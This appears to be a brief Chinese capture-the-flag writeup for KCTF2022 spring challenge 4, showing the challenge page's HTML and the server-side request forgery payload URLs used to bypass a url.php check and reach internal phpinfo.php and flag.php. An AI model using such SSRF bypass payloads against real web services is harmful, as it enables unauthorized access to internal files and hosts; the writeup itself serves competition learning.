-
-
[原创]KCTF2022春 第四题 飞蛾扑火 writeup
-
2022-5-15 17:08
-
访问 http://101.89.140.207:8044/
1 2 3 4 5 6 7 8 9 10 | <html><head><meta charset="utf-8"><title>欢迎挑战 Design by 香草</title></head><body><!--phpinfo.php--><img src="url.php?url=https://ctf.pediy.com/upload/team/762/team236762.png"></body></html> |
先把url.php重定向过了,做到ssrf
1 | http://101.89.140.207:8044/url.php?url=127.0.0.1://ctf.pediy.com/../phpinfo.php |
看到curl下支持的协议存在file
http://101.89.140.207:8044/url.php?url=123.57.254.42://localhost/../flag.php
看雪招聘平台创建简历并且简历完整度达到90%及以上可获得500看雪币~
|
|
|---|---|
